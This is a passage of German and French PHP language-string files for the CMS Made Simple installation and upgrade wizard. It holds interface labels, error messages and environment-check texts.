$lang['email_accountinfo_message'] = 'Ihre Installation von CMS Made Simple ist abgeschlossen. Diese E-Mail enthält vertrauliche Informationen und sollte daher an einem gesicherten Ort gespeichert werden.

Hier sind die Details der Installation:

Benutzername: %s
Kennwort: %s
Installationsverzeichnis: %s
Wurzelverzeichnis: %s';
$lang['email_accountinfo_message_exp'] = 'Herzlichen Glückwunsch, die Installation von CMS Made Simple ist vollzogen. Diese E-Mail enthält vertrauliche Informationen und sollte an einem sicheren Ort gespeichert oder nach Kenntnisnahme gelöscht werden.

Hier sind die Details der Installation:
Benutzername: %s
Kennwort: %s
Installationsverzeichnis: %s';
$lang['email_accountinfo_subject'] = 'Die Installation von CMS Made Simple war erfolgreich';
$lang['emailaccountinfo'] = 'E-Mail mit Zugangsinformationen senden';
$lang['emailaddr'] = 'E-Mail-Adresse';
$lang['error_adminacct_emailaddr'] = 'Die angegebene E-Mail-Adresse ist ungültig';
$lang['error_adminacct_password'] = 'Das angegebene Kennwort ist ungültig (muss eine Mindestlänge von sechs Zeichen haben)';
$lang['error_adminacct_repeatpw'] = 'Die eingegebenen Kennwörter stimmen nicht überein';
$lang['error_adminacct_username'] = 'Der angegebene Benutzername ist ungültig; bitte nochmal versuchen.';
$lang['error_createtable'] = 'Es war nicht möglich, eine Datenbanktabelle anzulegen; möglicherweise gibt es ein Berechtigungsproblem.';
$lang['error_dbconnect'] = 'Es konnte keine Verbindung zur Datenbank aufgebaut werden. Bitte überprüfen sie die angegebenen Verbindungsdaten.';
$lang['error_dirnotvalid'] = 'Das Verzeichnis %s existiert nicht oder hat keine Schreibberechtigung';
$lang['error_droptable'] = 'Es war nicht möglich, eine Datenbanktabelle zu löschen; möglicherweise gibt es ein Berechtigungsproblem.';
$lang['error_filenotwritable'] = 'Die Datei „%s“ konnte aufgrund fehlender Berechtigungen nicht überschrieben werden.';
$lang['error_internal'] = 'Entschuldigung, es gab einen internen Fehler (%s).';
$lang['error_invalidconfig'] = 'Es gibt einen Fehler in der Konfigurationsdatei oder diese Datei existiert nicht.';
$lang['error_invaliddbpassword'] = 'Das Datenbankkennwort enthält Zeichen, die nicht sicher gespeichert werden können.';
$lang['error_noarchive'] = 'Die Archivdatei konnte nicht gefunden werden; bitte nochmal von vorn beginnen.';
$lang['error_nlsnotfound'] = 'Die NLS-Dateien konnten nicht im Archiv gefunden werden';
$lang['error_nodestdir'] = 'Zielverzeichnis nicht angegeben';
$lang['error_sendingmail'] = 'Fehler';
$lang['errorlevel_estrict'] = 'Prüfe E_STRICT-Einstellungen';
$lang['errorlevel_edeprecated'] = 'Prüfe E_DEPRECATED-Einstellungen';
$lang['failed'] = 'fehlgeschlagen';
$lang['file_installed'] = '%s installiert';
$lang['finished_custom_install_msg'] = 'Herzlichen Glückwunsch, es ist geschafft. Bitte besuchen sie ihre Website und melden sie sich im Administrationsbereich an.';
$lang['freshen'] = 'Installation auffrischen/reparieren';
$lang['gd_version'] = 'GD-Version';
$lang['goback'] = 'Zurück';
$lang['install'] = 'Installieren';
$lang['install_backupconfig'] = 'Sicherung der Konfigurationsdatei';
$lang['install_create_tables'] = 'Erstellung von Datenbanktabellen';
$lang['install_createconfig'] = 'Erstellung einer neuen Konfigurationsdatei';
$lang['install_createcontentpages'] = 'Erstellung von Standardseiten';
$lang['install_createtmpdirs'] = 'Erstellung temporärer Verzeichnisse';
$lang['install_defaultcontent'] = 'Installation von Standardinhalten';
$lang['install_detectlanguages'] = 'Erfassung installierter Sprachen';
$lang['install_initevents'] = 'Erstellung von Ereignissen';
$lang['install_initsiteperms'] = 'Einstellung standardmäßiger Berechtigungen';
$lang['install_initsiteprefs'] = 'Einstellung standardmäßiger Seiteneinstellungen';
$lang['install_initsiteusers'] = 'Erstellung des ersten Benutzerkontos';
$lang['install_module'] = 'Installation des Moduls „%s“';
$lang['install_modules'] = 'Installation verfügbarer Module';
$lang['legend'] = 'Legende';
$lang['memory_limit'] = 'Prüfung, ob PHP-Speicherbegrenzung ausreicht';
$lang['msg_upgrade_module'] = 'Aktualisierung des Moduls „%s“';
$lang['msg_upgrademodules'] = 'Aktualisierung der Module';
$lang['next'] = 'Nächste';
$lang['no'] = 'Nein';
$lang['none'] = 'Kein';
$lang['open_basedir'] = 'Prüfung der open_basedir-Einstellung';
$lang['password'] = 'Kennwort';
$lang['php_version'] = 'PHP-Version';
$lang['prompt_addlanguages'] = 'Zusätzliche Sprachen';
$lang['prompt_dbname'] = 'Datenbankname';
$lang['prompt_dbpass'] = 'Kennwort';
$lang['prompt_dbtype'] = 'Datenbanktyp';
$lang['prompt_dbuser'] = 'Benutzername';
$lang['prompt_dir'] = 'Installationsverzeichnis';
$lang['prompt_installcontent'] = 'Beispielinhalte installieren';
$lang['prompt_timezone'] = 'Server-Zeitzone';
$lang['repeatpw'] = 'Kennwort wiederholen';
$lang['retry'] = 'nochmal versuchen';
$lang['step1_advanced'] = 'Erweiterter Modus';
$lang['step1_destdir'] = 'Verzeichnis auswählen';
$lang['step1_language'] = 'Sprache wählen';
$lang['step1_title'] = 'Sprache wählen';
$lang['step2_cmsmsfound'] = 'Eine Installation von CMS Made Simple wurde gefunden. Es ist möglich, diese Installation zu aktualisieren. Bevor Sie fortfahren, vergewissern Sie sich jedoch, dass Sie über eine aktuelle, VERIFIZIERTE Sicherung aller Dateien und der Datenbank verfügen.';
$lang['step2_info_freshen'] = 'Das Auffrischen der Installation umfasst das Ersetzen aller Kerndateien und das erneute Erstellen der Konfiguration. Sie werden nach grundlegenden Konfigurationsinformationen gefragt, die Datenbank wird jedoch nicht berührt.';
$lang['step2_install_dirnotempty2'] = 'Dieser Ordner enthält bereits einige Dateien und/oder Unterordner. Obwohl es möglich ist, CMS Made Simple hier zu installieren, kann es versehentlich eine vorhandene Anwendung beschädigen. Bitte überprüfen Sie den Inhalt dieses Ordners. Zu Referenzzwecken sind einige der Dateien unten aufgeführt. Bitte stellen Sie sicher, dass dies korrekt ist.';
$lang['step2_info_upgradeinfo'] = 'Nachfolgend finden Sie die verfügbaren Versionshinweise und Änderungsprotokollinformationen für jede Version. Die Schaltflächen unten zeigen detaillierte Informationen darüber, was sich in jeder Version von CMS Made Simple geändert hat. In jeder Version können weitere Anweisungen oder Warnungen enthalten sein, die den Aktualisierungsprozess beeinträchtigen könnten.';
$lang['step2_minupgradever'] = 'Die Mindestversion, von der diese Anwendung aktualisiert werden kann, ist: %s. Möglicherweise müssen Sie Ihre Anwendung schrittweise auf eine neuere Version aktualisieren, indem Sie eine andere Methode verwenden, bevor Sie den Aktualisierungsvorgang abschließen. Bitte stellen Sie sicher, dass Sie über eine vollständige, verifizierte Sicherungskopie verfügen, bevor Sie eine Aktualisierungsmethode verwenden.';
$lang['step2_passed'] = 'bestanden';
$lang['step2_schemaver'] = 'Version des Datenbankschemas';
$lang['step2_version'] = 'Ihre Version';
$lang['step3_failed'] = 'Dieses Paket hat zahlreiche Prüfungen Ihrer PHP-Umgebung durchgeführt, und einer oder mehrere dieser Prüfungen sind fehlgeschlagen. Sie müssen diese Fehler in Ihrer Konfiguration beheben, bevor Sie fortfahren. Nachdem Sie die Fehler behoben haben, klicken Sie unten auf „Wiederholen“.';
$lang['symbol'] = 'Symbol';
$lang['th_status'] = 'Status';
$lang['th_testname'] = 'Prüfung';
$lang['th_value'] = 'Wert';
$lang['title_error'] = 'Ein Problem ist aufgetreten';
$lang['title_welcome'] = 'Willkommen';
$lang['title_forum'] = 'Hilfe-Forum';
$lang['title_docs'] = 'Offizielle Dokumentation';
$lang['title_api_docs'] = 'Offizielle API-Dokumentation';
$lang['title_share'] = 'Erfahrungen mit Freunden teilen';
$lang['upgrade'] = 'Aktualisieren';
$lang['username'] = 'Benutzername';
$lang['warn_tests'] = '<strong>Hinweis:</strong> Das Bestehen all dieser Prüfungen sollte sicherstellen, dass CMSMS für die meisten Websites ordnungsgemäß funktioniert. Wenn die Website jedoch wächst und weitere Funktionen hinzugefügt werden, können diese Mindestwerte unzureichend werden. Darüber hinaus können Module von Drittanbietern weitere Anforderungen haben, um ordnungsgemäß zu funktionieren';
$lang['warn_upload_max_filesize'] = 'Obwohl Ihre Einstellung von %s ausreichend ist, empfehlen wir Ihnen, die Einstellung upload_max_filesize in PHP auf mindestens %s zu erhöhen';
$lang['welcome_message'] = 'Herzlich willkommen! Dies ist der automatische Installationsmechanismus von CMS Made Simple. Mit diesem Paket können Sie schnell und einfach bestätigen, dass Ihr Webhost mit CMSMS kompatibel ist, und die neueste Version von CMS Made Simple installieren oder aktualisieren.<br />Wir wissen, dass es Ihnen gefallen wird.';
$lang['wizard_step1'] = 'Willkommen';
$lang['wizard_step2'] = 'Erfassung bereits existierender Software';
$lang['wizard_step3'] = 'Kompatibilitätsprüfung';
$lang['wizard_step6'] = 'Webseiteneinstellungen';
$lang['wizard_step7'] = 'Dateien';
$lang['wizard_step9'] = 'Abschließen';
$lang['xml_functions'] = 'Prüfe XML-Funktionalität';
$lang['yes'] = 'Ja';
?><?php
$lang['action_freshen'] = 'Réparer/Rafraîchir une installation CMSMS %s';
$lang['action_install'] = 'Créer une nouvelle installation CMSMS %s';
$lang['action_upgrade'] = 'Mise à jour de CMSMS à la version %s';
$lang['advanced_mode'] = 'Activer le mode avancé&nbsp;';
$lang['apptitle'] = 'Assistant Installation/Mise à jour';
$lang['assets_dir_exists'] = 'Le dossier assets existe déjà';
$lang['available_languages'] = 'Langues disponibles&nbsp;';
$lang['build_date'] = 'Date de construction&nbsp;';
$lang['changelog_uc'] = 'Changelog';
$lang['cleaning_files'] = 'Nettoyage des fichiers qui ne sont plus applicables à cette version';
$lang['config_writable'] = 'Vérification des permissions d\'écriture du fichier config';
$lang['confirm_freshen'] = 'Êtes-vous sûr(e) de vouloir rafraîchir l’installation existante de CMSMS ? A utiliser avec une extrême prudence !';
$lang['confirm_upgrade'] = 'Êtes-vous sûr(e) de vouloir entamer le processus de mise à jour ?';
$lang['curl_extension'] = 'Vérification de l\'extension cURL';
$lang['create_assets_structure'] = 'Création d\'un emplacement pour les ressources de fichiers';
$lang['database_support'] = 'Vérification de la compatibilité des pilotes de base de données';
$lang['desc_wizard_step1'] = 'Démarrage de l\'installation ou de la mise à jour';
$lang['desc_wizard_step2'] = 'Analyse du dossier d\'installation pour trouver une installation existante';
$lang['desc_wizard_step3'] = 'Vérification que tout est OK pour installer le noyau CMSMS™';
$lang['desc_wizard_step4'] = 'Pour les nouvelles installations ou pour rafraîchir l\'installation, entrez les informations de base de la configuration';
$lang['desc_wizard_step5'] = 'Pour les nouvelles installations, entrez les informations du compte Admin';
$lang['desc_wizard_step6'] = 'Pour les nouvelles installations, entrez quelques détails basiques à propos du site';
$lang['desc_wizard_step7'] = 'Extraction des fichiers';
$lang['desc_wizard_step8'] = 'Création ou mise à jour du schéma de base de données, définition des événements initiaux, autorisations, comptes d\'utilisateurs, gabarits, feuilles de style et contenus';
$lang['desc_wizard_step9'] = 'Installation et/ou mise à jour des modules selon les besoins, écriture du fichier de configuration et nettoyage';
$lang['destination_directory'] = 'Dossier d\'installation&nbsp;';
$lang['dest_writable'] = 'Autorisation en écriture dans le dossier d\'installation';
$lang['disable_functions'] = 'Vérification des fonctions désactivées';
$lang['done'] = 'Terminé';
$lang['email_accountinfo_message'] = 'Le processus d\'installation CMS Made Simple est terminé.

Cet email contient des informations sensibles et doit être stocké dans un emplacement sécurisé.

Voici les détails de votre installation :
Nom d\'utilisateur : %s
mot de passe : %s
Dossier d\'installation : %s
root URL : %s';
$lang['email_accountinfo_message_exp'] = 'Le processus d\'installation CMS Made Simple est terminé.

Cet email contient des informations sensibles et doit être stocké dans un emplacement sécurisé.

Voici les détails de votre installation :
Nom d\'utilisateur : %s
mot de passe : %s
Dossier d\'installation : %s';
$lang['email_accountinfo_subject'] = 'Installation CMS Made Simple™ réussie';
$lang['emailaccountinfo'] = 'Envoi par mail des informations du compte';
$lang['emailaddr'] = 'Adresse email';
$lang['error_adminacct_emailaddr'] = 'L\'adresse e-mail spécifiée n\'est pas valide';
$lang['error_adminacct_emailaddrrequired'] = 'Vous avez choisi d\'envoyer les informations du compte par email, mais n\'avez pas entré une adresse email valide';
$lang['error_adminacct_password'] = 'Le mot de passe spécifié n\'est pas valide (doit comporter au moins six caractères)';
$lang['error_adminacct_repeatpw'] = 'Les mots de passe que vous avez entrés ne correspondent pas.';
$lang['error_adminacct_username'] = 'Le nom d\'utilisateur que vous avez spécifié n\'est pas valide. Essayez de nouveau';
$lang['error_admindirrenamed'] = 'Il semble que pour des raisons de sécurité <a href="http://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external">vous avez renommé</a> votre dossier admin de CMSMS™. Vous devrez obligatoirement le renommer en admin et modifier la variable $config[\'admin_dir\'] du config.php avant de reprendre le processus de la mise à jour. Rechargez la page pour continuer.';
$lang['error_backupconfig'] = 'Nous ne pourrions pas correctement sauvegarder le fichier de config';
$lang['error_checksum'] = 'Le checksum du fichier extrait ne correspond pas à l\'original';
$lang['error_cmstablesexist'] = 'Il semble qu\'il existe déjà une installation de CMSMS™ sur cette base de données. Merci d\'entrer une information différente pour la base de données. Si vous souhaitez, vous pouvez utiliser un préfixe de table différent. Mais vous devriez peut-être redémarrer le processus d\'installation et activer le mode avancé.';
$lang['error_createtable'] = 'Problème de création des tables de la base de données... c\'est peut-être un problème de permissions';
$lang['error_dbconnect'] = 'Impossible de se connecter à la base de données. Veuillez vérifier les informations d\'identification que vous avez fournies';
$lang['error_dirnotvalid'] = 'Le dossier %s n\'existe pas (ou n\'est pas accessible en écriture)';
$lang['error_droptable'] = 'Problème de suppression de table de la base de données... c\'est peut-être un problème de permissions';
$lang['error_filenotwritable'] = 'Le fichier %s n\'a pas pu être écrasé (problème permissions)';
$lang['error_internal'] = 'Désolé, quelque chose a mal fonctionné... (Erreur interne) (%s)';
$lang['error_invalid_directory'] = 'Il semble que le dossier que vous avez choisi pour installer est déjà dans un dossier utilisé par le programme d\'installation lui-même';
$lang['error_invalidconfig'] = 'Erreur dans le fichier de configuration ou fichier de configuration manquant (config.php)';
$lang['error_invaliddbpassword'] = 'Le mot de passe de la base de données contient des caractères non valides qui ne peuvent pas être sauvegardés en toute sécurité.';
$lang['error_invalidkey'] = 'Variable invalide ou clef %s pour classe %s';
$lang['error_invalidparam'] = 'Paramètre invalide ou valeur de paramètre : %s';
$lang['error_invalidtimezone'] = 'Le fuseau horaire spécifié n\'est pas valide';
$lang['error_invalidqueryvar'] = 'La saisie contient des caractères non valides. Veuillez utiliser uniquement des caractères alphanumériques et l\'underscore.';
$lang['error_missingconfigvar'] = 'La clef "%s" est manquante ou invalide dans le fichier config.ini';
$lang['error_noarchive'] = 'Problème pour trouver le fichier archive... Merci de redémarrer';
$lang['error_nlsnotfound'] = 'Problème pour trouver les fichiers NLS dans l\'archive';
$lang['error_nodatabases'] = 'Aucune extension compatible base de données n\'a été trouvée';
$lang['error_nodbhost'] = 'Veuillez entrer un nom d\'hôte valide (ou adresse IP) pour la connexion de base de données';
$lang['error_nodbname'] = 'Veuillez entrer le nom d\'une base de données valide sur l\'hôte spécifié ci-dessus';
$lang['error_nodbpass'] = 'Veuillez entrer un mot de passe valide pour l\'authentification avec la base de données';
$lang['error_nodbprefix'] = 'Veuillez entrer un préfixe valide pour les tables de la base de données';
$lang['error_nodbtype'] = 'Veuillez sélectionner un type de base de données';
$lang['error_nodbuser'] = 'Veuillez entrer un nom d\'utilisateur valide pour l\'authentification avec la base de données';
$lang['error_nodestdir'] = 'Dossier d\'installation non activé';
$lang['error_nositename'] = 'SiteName (Nom du site) est un paramètre obligatoire. Merci d’entrer un nom approprié pour votre site Web.';
$lang['error_notimezone'] = 'Veuillez entrer un fuseau horaire valide pour ce serveur';
$lang['error_overwrite'] = 'Problème de permissions : écriture impossible de %s';
$lang['error_sendingmail'] = 'Erreur dans l\'envoi du mail';
$lang['error_tzlist'] = 'Un problème est survenu pour la récupération de la liste des identificateurs de fuseau horaire';
$lang['errorlevel_estrict'] = 'Test pour E_STRICT';
$lang['errorlevel_edeprecated'] = 'Test pour E_DEPRECATED';
$lang['edeprecated_enabled'] = 'E_DEPRECATED est activé dans "error_reporting" de PHP. Bien que cela n\'empêchera pas CMSMS™ de fonctionner, il peut se produire des affichages d\'avertissements sur l\'écran, en particulier des anciens modules tiers.';
$lang['estrict_enabled'] = 'E_STRICT est activé dans "error_reporting" de PHP. Bien que cela n\'empêchera pas CMSMS™ de fonctionner, il peut se produire des affichages d\'avertissements sur l\'écran, en particulier des anciens modules tiers.';
$lang['fail_assets_dir'] = 'Un dossier assets existe déjà. Cette application peut écrire dans ce dossier pour rationaliser l\'emplacement des fichiers gabarits (templates), CSS, module_custom, admin_custom, ... . Veuillez vous assurer d\'avoir une sauvegarde.';
$lang['fail_assets_msg'] = 'Un dossier assets existe déjà. Cette application peut écrire dans ce dossier pour rationaliser l\'emplacement des fichiers gabarits (templates), CSS, module_custom, admin_custom, ... . Veuillez vous assurer d\'avoir une sauvegarde.';
$lang['fail_config_writable'] = 'Le processus HTTP ne peut pas écrire dans le fichier config.php. Essayer de modifier les autorisations sur ce fichier à 777, jusqu\'à ce que le processus de mise à jour soit terminé.';
$lang['fail_curl_extension'] = 'L\'extension cURL n\'a pas été trouvée. Ce n\'est pas un problème critique mais cela peut causer des soucis avec certains modules tiers';
$lang['fail_database_support'] = 'Aucun pilote compatible avec la base de données';
$lang['fail_file_get_contents'] = 'La fonction file_get_contents n\'existe pas ou est désactivée. CMSMS™ ne peut pas continuer (le programme d\'installation échouera probablement)';
$lang['fail_file_uploads'] = 'Les fonctionnalités d\'uploads de fichiers sont désactivés, dans cet environnement. Plusieurs fonctions de CMSMS™ ne fonctionneront pas dans cet environnement.';
$lang['fail_func_json'] = 'La fonctionnalité "JSON" n\'a pas été trouvée.';
$lang['fail_func_gzopen'] = 'La fonction "gzopen" n\'a pas été trouvée.';
$lang['fail_func_md5'] = 'La fonctionnalité MD5 n\'a pas été trouvée.';
$lang['fail_func_tempnam'] = 'La fonctionnalité "tempnam" n\'existe pas. C\'est une fonction requise pour le fonctionnement de CMSMS™';
$lang['fail_func_ziparchive'] = 'La fonctionnalité ZipArchive n\'a pas été trouvée. Cela peut limiter les fonctions d\'installation.';
$lang['fail_ini_set'] = 'Il semble que nous ne pouvons pas changer les paramètres ini. Ceci pourrait causer des problèmes dans les modules tiers (ou lorsque vous activez le mode debug). C\'est une fonction requise pour la fonctionnalité de CMSMS™';
$lang['fail_intl_support'] = 'L\'extension d\'internationalisation de PHP (Intl) n’est pas disponible';
$lang['fail_magic_quotes_runtime'] = 'Il semble que les "magic quotes" sont activées dans votre configuration. Merci de les désactiver puis réessayer';
$lang['fail_max_execution_time'] = 'Votre "max execution time" de %s ne répond pas à la valeur minimale de %s. Nous vous recommandons de l\'augmenter à %s ou supérieur';
$lang['fail_memory_limit'] = 'Valeur de "memory_limit" est trop faible. Vous avez %s, mais il faut un minimum de %s et %s est recommandé';
$lang['fail_multibyte_support'] = 'Votre support Multibyte (jeux de caractères multi-octets) n\'est pas activé dans votre configuration';
$lang['fail_output_buffering'] = 'Mise en mémoire tampon de sortie (Output Buffering) n\'est pas activée.';
$lang['fail_open_basedir'] = 'L\'option "open_basedir" est activée. CMSMS™ exige qu\'elle soit désactivée';
$lang['fail_php_version'] = 'La version de PHP pour CMSMS™ est cruciale. La version minimum accepté est %s, même si nous recommandons %s ou supérieure. Vous avez %s';
$lang['fail_post_max_size'] = 'La taille %s de "post_max_size" ne répond pas cependant la valeur minimale de %s. Vous devriez porter à %s et faire en sorte qu\'il soit plus grand que "upload_max_filesize"';
$lang['fail_pwd_writable2'] = 'Le processus HTTP doit être en mesure d\'écrire dans le dossier d\'installation (ainsi que dans tous les fichiers et sous-dossiers), afin d\'installer les fichiers. Il n\'y a pas d\'autorisation en écriture pour (au moins) %s';
$lang['fail_register_globals'] = 'Veuillez désactiver "register_globals" dans votre configuration de PHP';
$lang['fail_remote_url'] = 'Nous avons rencontré des problèmes pour vous connecter à une URL distante. Vous limitez ainsi certaines des fonctionnalités de CMS Made Simple™';
$lang['fail_safe_mode'] = 'CMSMS™ ne fonctionnera pas correctement dans un environnement où le "safe_mode" est activé. "safe_mode" est déconseillé comme un mécanisme défaillant et sera supprimée dans les futures versions de PHP. (Disponible depuis PHP 4.1.0. Supprimé en PHP 5.4.0)';
$lang['fail_session_save_path_exists'] = 'La variable session.save_path est non valide ou le répertoire n\'existe pas';
$lang['fail_session_save_path_writable'] = 'Le chemin du répertoire session n\'est pas accessible en écriture';
$lang['fail_session_use_cookies'] = 'CMSMS requiert que PHP soit configuré pour stocker les clefs de session dans un cookie';
$lang['fail_tmpfile'] = 'La fonction tmpfile() du système est non fonctionnelle. Cela est nécessaire pour extraire des archives. L\'option TMPDIR (chemin du dossier temporaire) peut être fourni à l\'installateur pour spécifier un dossier accessible en écriture. Voir le fichier README qui devrait être inclus dans ce répertoire.';
$lang['fail_tmp_dirs_empty'] = 'Les dossiers temporaires CMSMS <em>(tmp / cache et tmp / templates_c)</em> existent et ne sont pas vides. Veuillez les supprimer ou les vider.';
$lang['fail_xml_functions'] = 'L\'extension XML n\'a pas été trouvée. Activer cette extension dans votre environnement PHP';
$lang['failed'] = 'A échoué';
$lang['file_get_contents'] = 'Test pour la fonction "file_get_contents"';
$lang['file_installed'] = 'Installé %s';
$lang['file_uploads'] = 'Vérification pour le support upload de fichier';
$lang['finished_custom_freshen_msg'] = 'Votre installation a été rafraîchie ! Les fichiers de base ont été mis à jour, et un nouveau fichier de configuration a été créé. Veuillez consulter votre site Web afin de vous assurer que tout fonctionne correctement.';
$lang['finished_custom_install_msg'] = 'Super ! Nous avons terminé. Veuillez consulter votre site Web et vous connecter au panneau d’administration.';
$lang['finished_custom_upgrade_msg'] = 'Super! Tout est terminé. Veuillez consulter votre panneau d’administration de CMSMS™ et votre site Web pour vous assurer que tout est correct. <br><strong>Astuce :</strong> Maintenant c’est le bon moment pour faire une sauvegarde.';
$lang['finished_freshen_msg'] = 'Votre installation a été rafraîchie ! Les fichiers de base ont été mis à jour et un nouveau fichier de configuration a été créé. Vous pouvez maintenant <a href="%s">visiter votre site Web</a> ou vous connecter au <a href="%s">panneau d’administration</a>.';
$lang['finished_install_msg'] = 'Super ! Nous avons terminé. Vous pouvez maintenant <a href="%s">visiter votre site Web</a> ou vous connecter au <a href="%s">panneau d’administration</a>.';
$lang['finished_upgrade_msg'] = 'Super ! Tout est terminé. Visitez votre <a href="%s">site Web</a> et le <a href="%s"> panneau d’administration</a> pour vérifier si tout se comporte correctement. Vous pourriez avoir également à mettre à jour certains modules tiers. <br><strong>Astuce :</strong> n’oubliez pas de faire une sauvegarde après avoir vérifié si les comportements de l’administration et du site sont corrects.';
$lang['freshen'] = 'Rafraîchir l\'installation';
$lang['func_json'] = 'Vérification pour JSON, codage et décodage des fonctionnalités';
$lang['func_md5'] = 'Vérification de la fonctionnalité MD5';
$lang['func_tempnam'] = 'Vérification de la fonction "tempnam"';
$lang['func_gzopen'] = 'Vérification de la fonction "gzopen"';
$lang['func_ziparchive'] = 'Vérification de la fonction "ZipArchive"';
$lang['gd_version'] = 'Vérification de la version GD';
$lang['goback'] = 'Retour';
$lang['info_addlanguages'] = 'Sélectionnez des langues (outre l\'anglais) pour l\'installation. <strong>Remarque :</strong> toutes les traductions ne sont pas faites. (Utiliser la touche "CTRL" pour la multi sélection)';
$lang['info_adminaccount'] = 'Merci de fournir les informations d\'identification pour le compte d\'administrateur initial. Ce compte aura accès à toutes les fonctionnalités de la console d\'administration CMSMS™';
$lang['info_advanced'] = 'Le mode avancé permet plus d\'options dans la procédure d\'installation.';
$lang['info_dbinfo'] = 'CMS Made Simple™ stocke une grande quantité de données en base de données. Une connexion de base de données est obligatoire. En outre, les informations d\'identification utilisateur que vous fournirez doivent, avoir tous les privilèges sur la base de données spécifiée pour permettre la création, suppression et modification des tables, index et vues.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED est une constante PHP de rapports d\'erreur ou d\'alertes d\'exécution. Bien que sur le noyau de CMSMS™ nous n\'utilisons plus de techniques obsolètes, certains modules peuvent ne pas être conformes. Nous recommandons de désactiver ce paramètre dans la configuration de PHP.';
$lang['info_errorlevel_estrict'] = 'E_STRICT est une constante PHP qui permet d\'obtenir des suggestions pour modifier votre code, assurant ainsi une meilleure interopérabilité et compatibilité de celui-ci. Bien que le noyau CMSMS™ tente de se conformer aux règles de niveau E_STRICT certains modules peuvent ne pas être conformes. Nous recommandons de désactiver ce paramètre dans la configuration de PHP.';
$lang['info_installcontent'] = 'Par défaut, ce programme d\'installation créera une série d\'exemples de pages, de feuilles de style et de gabarits dans CMSMS™. Les exemples de contenu fournissent de nombreuses informations et conseils afin de vous aider pour créer des sites Web avec CMSMS™. Il est utile de lire ces pages exemples. Toutefois, si vous êtes déjà familier avec CMS Made simple™ la désactivation de cette option créera seulement un ensemble minimal de gabarits, de feuilles de style et de pages de contenu.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir est activé dans votre configuration PHP. Nous n\'avons pas pu tester pas correctement les capacités de session. Cependant, à ce point du processus d\'installation, tout semble indiquer, que les sessions fonctionnent correctement.';
$lang['info_pwd_writable'] = 'Cette application requiert l\'autorisation en écriture pour le dossier de travail courant';
$lang['info_queryvar'] = 'La variable de requête URL est utilisée en interne par CMSMS™ pour identifier la page demandée (par défaut "page"). Dans la plupart des cas, vous ne devriez pas avoir à en avoir besoin.';
$lang['info_sitename'] = 'Le nom du site est utilisé dans les gabarits par défaut comme titre. Veuillez entrer un nom lisible pour le site Web.';
$lang['info_timezone'] = 'Les informations de fuseau horaire sont nécessaire pour l\'affichage des calculs des heures/dates. Veuillez sélectionner le fuseau horaire du serveur.';
$lang['ini_set'] = 'Test si possibilité de changer les paramètres du fichier ini';
$lang['install'] = 'Installer';
$lang['install_attachstylesheets'] = 'Attacher les feuilles de style aux thèmes';
$lang['install_backupconfig'] = 'Sauvegarde du fichier de config';
$lang['install_createassets'] = 'Création des dossiers assets';
$lang['install_created_index'] = 'Index créé %s... : %s';
$lang['install_create_tables'] = 'Création des tables de base de données';
$lang['install_createconfig'] = 'Création du nouveau fichier de configuration';
$lang['install_createcontentpages'] = 'Création des pages de contenu par défaut';
$lang['install_created_table'] = 'Table créée %s... : %s';
$lang['install_createtablesindexes'] = 'Création des tables et index';
$lang['install_createtmpdirs'] = 'Création des dossiers temporaires';
$lang['install_creating_index'] = 'Index créé %s';
$lang['install_default_collections'] = 'Installation des collections par défaut';
$lang['install_defaultcontent'] = 'Installation du contenu par défaut';
$lang['install_detectlanguages'] = 'Détection des langues installées';
$lang['install_dropping_tables'] = 'Suppression de tables';
$lang['install_dummyindexhtml'] = 'Création des fichiers vides index.html';
$lang['install_extractfiles'] = 'Extraction des fichiers de l\'archive';
$lang['install_initevents'] = 'Création des évènements';
$lang['install_initsitegroups'] = 'Création des groupes initiaux';
$lang['install_initsiteperms'] = 'Définition des permissions initiales';
$lang['install_initsiteprefs'] = 'Définition des préférences initiales du site';
$lang['install_initsiteusers'] = 'Création du compte utilisateur initial';
$lang['install_initsiteusertags'] = 'Création des balises utilisateur (UDT) initiales';
$lang['install_module'] = 'Installation du module %s';
$lang['install_modules'] = 'Installation des modules disponibles';
$lang['install_passwordsalt'] = 'Définition de la valeur aléatoire du mot de passe (salt)';
$lang['install_requireddata'] = 'Définition des données initiales requises';
$lang['install_schema'] = 'Création du schéma de base de données';
$lang['install_setschemaver'] = 'Définition de la version du schéma';
$lang['install_setsequence'] = 'Réinitialisation des séquences tables';
$lang['install_setsitename'] = 'Définition du nom du site';
$lang['install_stylesheets'] = 'Création des feuilles de style par défaut';
$lang['install_templates'] = 'Création des gabarits par défaut';
$lang['install_templatetypes'] = 'Création des types de gabarit standard';
$lang['install_update_sequences'] = 'Mise à jour des séquences des tables';
$lang['install_updatehierarchy'] = 'Mise à jour des positions hiérarchiques des pages';
$lang['install_updateseq'] = 'Séquence de mise à jour pour %s';
$lang['installer_ver'] = 'Version de l\'installateur&nbsp;';
$lang['intl_support'] = 'Vérifier les fonctions d\'internationalisation';
$lang['legend'] = 'Légende';
$lang['magic_quotes_runtime'] = 'Vérification si les "magic_quotes" sont désactivées';
$lang['max_execution_time'] = 'Vérification de PHP "max_execution_time"';
$lang['meaning'] = 'Définition';
$lang['memory_limit'] = 'Vérification de la limite de mémoire PHP (memory_limit)';
$lang['msg_clearedcache'] = 'Cache serveur vidé';
$lang['msg_configsaved'] = 'Fichier de configuration existant enregistré sous %s';
$lang['msg_upgrade_module'] = 'Mise à jour du module %s';
$lang['msg_upgrademodules'] = 'Mise à jour des modules';
$lang['msg_yourvalue'] = 'Vous avez : %s';
$lang['multibyte_support'] = 'Vérification du support Multibyte (jeux de caractères multi-octets)';
$lang['next'] = 'Suivant';
$lang['no'] = 'Non';
$lang['none'] = 'Aucun';
$lang['open_basedir'] = 'Vérification de la restriction "open_basedir"';
$lang['open_basedir_session_save_path'] = 'open_basedir est activé. Impossible de tester le chemin du répertoire session.';
$lang['output_buffering'] = 'Vérification des buffers de sortie (output buffering)';
$lang['pass_config_writable'] = 'Le processus HTTP a l\'autorisation en écriture dans le fichier config.php';
$lang['pass_database_support'] = 'Au moins un pilote de base de données compatible trouvé';
$lang['pass_func_json'] = 'Fonctionnalité JSON détectée';
$lang['pass_func_md5'] = 'Fonctionnalité MD5 détectée';
$lang['pass_func_tempnam'] = 'La fonction "tempnam" existe';
$lang['pass_intl_support'] = 'Les fonctions d\'internationalisation semblent être activées';
$lang['pass_memory_limit_nolimit'] = 'Il n\'y a pas de limite à PHP memory_limit';
$lang['pass_multibyte_support'] = 'le support Multibyte semble être activé';
